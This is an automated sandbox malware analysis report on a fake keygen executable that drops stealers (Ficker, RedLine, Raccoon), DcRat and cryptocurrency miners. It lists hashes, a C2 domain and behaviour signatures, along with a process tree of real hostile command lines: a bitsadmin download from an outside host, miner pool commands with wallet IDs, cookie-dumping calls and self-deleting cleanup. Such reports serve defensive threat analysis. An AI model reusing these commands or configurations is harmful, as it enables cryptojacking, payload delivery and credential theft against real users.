Resubmissions

24-04-2021 20:33

210424-t3nc6v2zm6 10

24-04-2021 20:33

210424-tvfj4vfree 10

Analysis

  • max time kernel
    1800s
  • max time network
    1799s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    24-04-2021 20:33

General

  • Target

    keygen-step-4 — копия.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 54 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1232
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2836
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2764
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          PID:2708
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2492
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1820
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1192
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1056
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:788
                    • C:\Users\Admin\AppData\Roaming\csguidb
                      C:\Users\Admin\AppData\Roaming\csguidb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:1184
                    • C:\Users\Admin\AppData\Roaming\rtguidb
                      C:\Users\Admin\AppData\Roaming\rtguidb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2852
                      • C:\Users\Admin\AppData\Roaming\rtguidb
                        C:\Users\Admin\AppData\Roaming\rtguidb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:5276
                    • C:\Users\Admin\AppData\Roaming\csguidb
                      C:\Users\Admin\AppData\Roaming\csguidb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:4356
                    • C:\Users\Admin\AppData\Roaming\rtguidb
                      C:\Users\Admin\AppData\Roaming\rtguidb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4900
                      • C:\Users\Admin\AppData\Roaming\rtguidb
                        C:\Users\Admin\AppData\Roaming\rtguidb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:4008
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\uWLqXxKeTaZF\uWLqXxKeTaZF.dll",uWLqXxKeTaZF
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:3804
                    • C:\Users\Admin\AppData\Roaming\csguidb
                      C:\Users\Admin\AppData\Roaming\csguidb
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:736
                    • C:\Users\Admin\AppData\Roaming\rtguidb
                      C:\Users\Admin\AppData\Roaming\rtguidb
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5776
                      • C:\Users\Admin\AppData\Roaming\rtguidb
                        C:\Users\Admin\AppData\Roaming\rtguidb
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:4392
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1004
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:3260
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3748
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:192
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:496
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:4084
                        • C:\Users\Admin\AppData\Local\Temp\is-3OQLP.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-3OQLP.tmp\Install.tmp" /SL5="$4015C,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:1736
                          • C:\Users\Admin\AppData\Local\Temp\is-ENV0I.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-ENV0I.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:636
                            • C:\Program Files\Windows Defender Advanced Threat Protection\LRFFKXEWKW\ultramediaburner.exe
                              "C:\Program Files\Windows Defender Advanced Threat Protection\LRFFKXEWKW\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3820
                              • C:\Users\Admin\AppData\Local\Temp\is-KV5BH.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-KV5BH.tmp\ultramediaburner.tmp" /SL5="$401DA,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\LRFFKXEWKW\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:3228
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4172
                            • C:\Users\Admin\AppData\Local\Temp\08-8b8b0-e0a-4ba82-a336561c2d013\Xoraefyjera.exe
                              "C:\Users\Admin\AppData\Local\Temp\08-8b8b0-e0a-4ba82-a336561c2d013\Xoraefyjera.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              PID:4124
                            • C:\Users\Admin\AppData\Local\Temp\f4-52afa-fd5-461a4-865f27147a1d9\Kaetotafoty.exe
                              "C:\Users\Admin\AppData\Local\Temp\f4-52afa-fd5-461a4-865f27147a1d9\Kaetotafoty.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4216
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jjgv1nsm.okv\instEU.exe & exit
                                6⤵
                                  PID:4832
                                  • C:\Users\Admin\AppData\Local\Temp\jjgv1nsm.okv\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\jjgv1nsm.okv\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4120
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jjr04bhp.1et\google-game.exe & exit
                                  6⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4800
                                  • C:\Users\Admin\AppData\Local\Temp\jjr04bhp.1et\google-game.exe
                                    C:\Users\Admin\AppData\Local\Temp\jjr04bhp.1et\google-game.exe
                                    7⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    • Suspicious use of SetWindowsHookEx
                                    • Suspicious use of WriteProcessMemory
                                    PID:5032
                                    • C:\Windows\SysWOW64\rundll32.exe
                                      "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                      8⤵
                                      • Loads dropped DLL
                                      PID:2224
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\spwx4lix.zva\md1_1eaf.exe & exit
                                  6⤵
                                    PID:5104
                                    • C:\Users\Admin\AppData\Local\Temp\spwx4lix.zva\md1_1eaf.exe
                                      C:\Users\Admin\AppData\Local\Temp\spwx4lix.zva\md1_1eaf.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      PID:3568
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xqmxqyo0.33o\y1.exe & exit
                                    6⤵
                                      PID:4408
                                      • C:\Users\Admin\AppData\Local\Temp\xqmxqyo0.33o\y1.exe
                                        C:\Users\Admin\AppData\Local\Temp\xqmxqyo0.33o\y1.exe
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        PID:3156
                                        • C:\Users\Admin\AppData\Local\Temp\Htu8H8CWzV.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Htu8H8CWzV.exe"
                                          8⤵
                                            PID:5984
                                            • C:\Users\Admin\AppData\Roaming\1619304462819.exe
                                              "C:\Users\Admin\AppData\Roaming\1619304462819.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619304462819.txt"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:5324
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Htu8H8CWzV.exe"
                                              9⤵
                                                PID:6076
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 127.0.0.1 -n 3
                                                  10⤵
                                                  • Runs ping.exe
                                                  PID:2920
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\xqmxqyo0.33o\y1.exe"
                                              8⤵
                                                PID:6056
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /T 10 /NOBREAK
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:4360
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xkr01bk4.mmv\askinstall39.exe & exit
                                            6⤵
                                              PID:5020
                                              • C:\Users\Admin\AppData\Local\Temp\xkr01bk4.mmv\askinstall39.exe
                                                C:\Users\Admin\AppData\Local\Temp\xkr01bk4.mmv\askinstall39.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:5292
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:6040
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:5244
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11ln5dde.ezn\inst.exe & exit
                                                6⤵
                                                  PID:5228
                                                  • C:\Users\Admin\AppData\Local\Temp\11ln5dde.ezn\inst.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11ln5dde.ezn\inst.exe
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5500
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dg5mm15w.zry\SunLabsPlayer.exe /S & exit
                                                  6⤵
                                                    PID:5636
                                                    • C:\Users\Admin\AppData\Local\Temp\dg5mm15w.zry\SunLabsPlayer.exe
                                                      C:\Users\Admin\AppData\Local\Temp\dg5mm15w.zry\SunLabsPlayer.exe /S
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Program Files directory
                                                      PID:5928
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:5772
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:6028
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1052
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:5572
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:5876
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5324
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      9⤵
                                                                        PID:5772
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                      8⤵
                                                                      • Checks for any installed AV software in registry
                                                                      PID:3564
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                      8⤵
                                                                      • Download via BitsAdmin
                                                                      PID:1320
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -peb4jzywoorYfqjx -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:5292
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pacW6lxxG1IaGlAt -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:4884
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:4236
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4412
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:4008
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5680
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5340
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWLqXxKeTaZF\uWLqXxKeTaZF.dll" uWLqXxKeTaZF
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                PID:4960
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWLqXxKeTaZF\uWLqXxKeTaZF.dll" uWLqXxKeTaZF
                                                                                  9⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  PID:4236
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:4828
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:5824
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                    • Drops file in Program Files directory
                                                                                    PID:3644
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:2972
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsxE4F9.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:4372
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Drops file in Program Files directory
                                                                                        PID:4008
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uht4y0lq.efw\GcleanerWW.exe /mixone & exit
                                                                                    6⤵
                                                                                      PID:6136
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zii510lw.q2n\toolspab1.exe & exit
                                                                                      6⤵
                                                                                        PID:5396
                                                                                        • C:\Users\Admin\AppData\Local\Temp\zii510lw.q2n\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\zii510lw.q2n\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5516
                                                                                          • C:\Users\Admin\AppData\Local\Temp\zii510lw.q2n\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\zii510lw.q2n\toolspab1.exe
                                                                                            8⤵
                                                                                              PID:5788
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dx5ba10p.izr\c7ae36fa.exe & exit
                                                                                          6⤵
                                                                                            PID:5688
                                                                                            • C:\Users\Admin\AppData\Local\Temp\dx5ba10p.izr\c7ae36fa.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\dx5ba10p.izr\c7ae36fa.exe
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:5220
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oviigctu.3sm\app.exe /8-2222 & exit
                                                                                            6⤵
                                                                                              PID:5320
                                                                                              • C:\Users\Admin\AppData\Local\Temp\oviigctu.3sm\app.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\oviigctu.3sm\app.exe /8-2222
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5232
                                                                                                • C:\Users\Admin\AppData\Local\Temp\oviigctu.3sm\app.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\oviigctu.3sm\app.exe" /8-2222
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:5820
                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Modifies system certificate store
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4356
                                                                                      • C:\Users\Admin\AppData\Roaming\B00C.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\B00C.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:4116
                                                                                        • C:\Users\Admin\AppData\Roaming\B00C.tmp.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\B00C.tmp.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks processor information in registry
                                                                                          PID:1300
                                                                                      • C:\Users\Admin\AppData\Roaming\B27E.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\B27E.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:1996
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w30814@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                          4⤵
                                                                                            PID:4584
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w2718 --cpu-max-threads-hint 50 -r 9999
                                                                                            4⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:4556
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4832
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:4188
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        PID:2264
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:2260
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5788
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5784
